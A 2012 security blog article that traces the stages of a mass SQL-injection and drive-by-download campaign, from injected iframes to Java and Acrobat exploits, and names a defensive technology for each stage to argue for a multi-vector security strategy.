APT

Anatomy of an Attack

August 6, 2012

Today, the sophisticated attacks on the internet target a combination of vulnerabilities. Consequently, the one-on-one protection approach based on a combination of security technology and threat is not enough. To effectively counter the current attacks posed by the internet, it is essential that a multi-vector security strategy is in place.

To understand it better, let us consider the example of a wide-scale SQL injection attack which harassed websites early in the month of May 2012.

Deciphering the attack
In the first step, an attacker checks the trustworthy websites for vulnerabilities, for instance, SQL injection or XSS vulnerability. In this incident, the attackers added an iframe to trustworthy, but vulnerable, websites via SQL injection. This served to redirect visitors of the website to one of the following domains: hgbyju.com, hnjhkm.com, nikjju.com, or njukol.com. At this stage – where one exploits a security loophole in a website - the risk of a successful attack could have been reduced by employing a reactive security technology such as a web application firewall. It could also have been averted through proactive security technologies like:

  • Source code review and binary analysis (static, non-runtime)
  • Web application scanner (dynamic, runtime)

The attack in question aimed various popular websites and randomly targeted unsuspecting website visitors. Despite the fact that step two in the figure was not actually a part of the attack, it could have been used to make it more effective - by sending an email to a targeted victim tempting him/her to visit an SQL injection or an XSS exploited website. This is the second stage where the risk can be reduced by deploying a security technology such as a SPAM filter to intercept phishing emails.

The third step in the attack involves the victim visiting an apparently trustworthy website, but being redirected to a malicious website. This is the third stage where the attack could possibly have been stopped, by deploying a security technology such as a content filter which could block either the dangerous content from the malicious website or the entire website itself.

This brings us to the fourth and last step in the attack. The internet browser of the victim executes client-side HTML/JavaScript codes, which originate from the malicious website, and exploit vulnerabilities in Oracle Java SE (CVE-2012-0507) or Adobe Acrobat and Reader (CVE-2010-0188) in the victim's system. If the vulnerability is successfully exploited, a Trojan horse is downloaded and executed on the victim's machine, exposing the victim to multiple potential risks including stealth of financial information and identity theft. At this stage, the attack could have been stopped by a network intrusion protection system, intercepting the exploit, or by proper system patch management (in case it's not a zero-day vulnerability), or by an anti-malware security technology on the network, blocking the trojan horse.

The security technologies mentioned above, except host patching, can be implemented either host-based and/or network-based. The major advantages of host-based implementation include:

  • They can provide protection against attacks launched through encrypted channels, since the encryption is terminated on the host
  • The “anytime, anywhere, anyhow” concept and cloud computing make it hard to control the path through which an endpoint connects to the internet

Hence, it logically follows that network-based security technologies are not an absolute these days. Deperimeterization for client endpoints due to the “anytime, anywhere, anyhow” concept and cloud computing often decrease the effectiveness of network-based security technologies. For server back-end core infrastructure, however, it is absolutely advisable to implement network-based security technologies. In fact, it is advisable that a defense-in-depth security strategy across data center network and hosts (servers) is not neglected.

As can be seen in the evaluation, the internet, especially ports 80 and 443, form the core for the successful launch of an attack. For an enterprise, there are different responsibility dimensions regarding security, which include the following:

  • Prevent its own users from becoming victims to threats as above
  • Accountability that its website visitors do not become a victim owing to lack of website security

It's time to bell the cat
Why is it that source code review, binary analysis, web application scanning, and web application firewalling are still under-exposed in enterprises? Aren't the responsibilities clear? Is it an infrastructure or application responsibility? Meanwhile, it's not surprising that attack scenarios are being orchestrated around the web while we are still trying to figure out who is responsible!

A clear lesson from the above is that mitigating an attack based on a one-on-one security strategy between security technology and threat is not sufficient anymore. The approach of a multi-vector security strategy, together with an integrated insight are fundamental for security.

In other words security intelligence, which enables an organization to assess the relevance of a threat or attack based on information from resources such as a configuration management database, a threat/security technology correlation tool, and a security information event manager, should be part as well of a multi-vector security strategy.
prestitial ad